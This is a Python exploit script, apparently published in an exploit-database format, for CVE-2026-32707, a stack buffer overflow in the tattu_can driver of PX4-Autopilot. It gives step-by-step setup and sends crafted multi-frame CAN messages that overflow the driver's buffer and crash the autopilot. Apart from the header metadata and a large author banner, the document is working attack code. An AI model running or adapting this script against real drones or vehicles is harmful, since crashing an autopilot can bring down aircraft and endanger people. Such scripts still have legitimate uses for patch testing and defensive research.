#!/usr/bin/env python3 # Exploit Title: PX4-Autopilot tattu_can Stack Buffer Overflow (DoS) # CVE: CVE-2026-32707 # Date: 2026-05-08 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Vendor Homepage: https://px4.io/ # Software Link: https://github.com/PX4/PX4-Autopilot # Affected: versions <= 1.17.0-rc1 (tattu_can driver) # Tested on: Ubuntu 22.04 / PX4 SITL with vcan0 # Category: Denial of Service (DoS) # Platform: Linux (SocketCAN) # Exploit Type: Stack Overflow # CVSS: 7.5 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H # CWE: CWE-121 (Stack-based Buffer Overflow) # Description: The tattu_can driver in PX4-Autopilot versions <=1.17.0-rc1 # performs an unbounded memcpy when reassembling multi‑frame CAN messages, # allowing an attacker with CAN bus access to corrupt the stack and crash # the autopilot. # Fixed in: commit 3f04b7a (PX4-Autopilot 1.17.0-rc2) # Usage: # python3 exploit.py # Examples: # python3 exploit.py vcan0 # python3 exploit.py can0 # Options: # - name of the CAN network interface (e.g., vcan0, can0) # Notes: # - Requires python-can library: pip install python-can # - Run with root privileges (CAP_NET_RAW) # - The target must have tattu_can started (e.g., 'tattu_can start') # How to Use # Step 1: Install python-can: pip install python-can # Step 2: Create virtual CAN if needed: sudo ip link add dev vcan0 type vcan && sudo ip link set up vcan0 # Step 3: Run: sudo python3 exploit.py vcan0 print(r""" ╔════════════════════════════════════════════════════════════════════════════════════════════╗ ║ ║ ║ ██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ███╗ ███╗███████╗██████╗ ║ ║ ██╔══██╗██╔══██╗████╗ ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██╗ ║ ║ ██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗ ██████╔╝ ║ ║ ██╔══██╗██╔══██║██║╚██╗██║ ╚██╔╝ ██╔══██║██║╚██╔╝██║██╔══╝ ██╔══██╗ ║ ║ ██████╔╝██║ ██║██║ ╚████║ ██║ ██║ ██║██║ ╚═╝ ██║███████╗██║ ██║ ║ ║ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ║ ║ ║ ║ [ b a n y a m e r _ s e c u r i t y ] ║ ║ ║ ║ ▸ Silent Hunter | Shadow Presence | Digital Intel ◂ ║ ║ ║ ║ Operator : Mohammed Idrees Banyamer • Jordan 🇯🇴 ║ ║ Handle : @banyamer_security ║ ║ ║ ║ Exploit : CVE-2026-32707 ║ ║ Target : PX4-Autopilot • tattu_can driver • CAN bus ║ ║ ║ ║ Status : ACTIVE ║ ║ ║ ╚════════════════════════════════════════════════════════════════════════════════════════════╝ """) import sys import can import time TAIL_BYTE_START_OF_TRANSFER = 0x80 TATTLES_STRUCT_SIZE = 48 START_OFFSET = 5 OVERFLOW_DLC = 8 CAN_ID = 0x123 def main(): if len(sys.argv) != 2: print("Usage: python3 exploit.py ") sys.exit(1) iface = sys.argv[1] try: bus = can.interface.Bus(channel=iface, bustype='socketcan', fd=False) except Exception as e: print(f"Failed to open CAN interface {iface}: {e}") sys.exit(1) print(f"[*] Sending start-of-transfer frame on {iface} (can_id=0x{CAN_ID:08X})") start_frame = can.Message( arbitration_id=CAN_ID | can.CAN_EFF_FLAG, data=[0xAA, 0xBB, 0xCC, 0xDD, 0xEE, 0xFF, 0x00, TAIL_BYTE_START_OF_TRANSFER], is_extended_id=True, dlc=8 ) bus.send(start_frame) print(f"[*] Sending 7 overflow frames (each copies {OVERFLOW_DLC - 1} bytes)...") for i in range(7): payload = [ord('A') + (i % 26)] * OVERFLOW_DLC frame = can.Message( arbitration_id=CAN_ID | can.CAN_EFF_FLAG, data=payload, is_extended_id=True, dlc=OVERFLOW_DLC ) bus.send(frame) time.sleep(0.01) final_payload = [0x42] * OVERFLOW_DLC final_frame = can.Message( arbitration_id=CAN_ID | can.CAN_EFF_FLAG, data=final_payload, is_extended_id=True, dlc=OVERFLOW_DLC ) print("[*] Sending final overflow frame...") bus.send(final_frame) print("[+] Attack sequence completed. The PX4 tattu_can driver should now crash.") bus.shutdown() if __name__ == "__main__": main()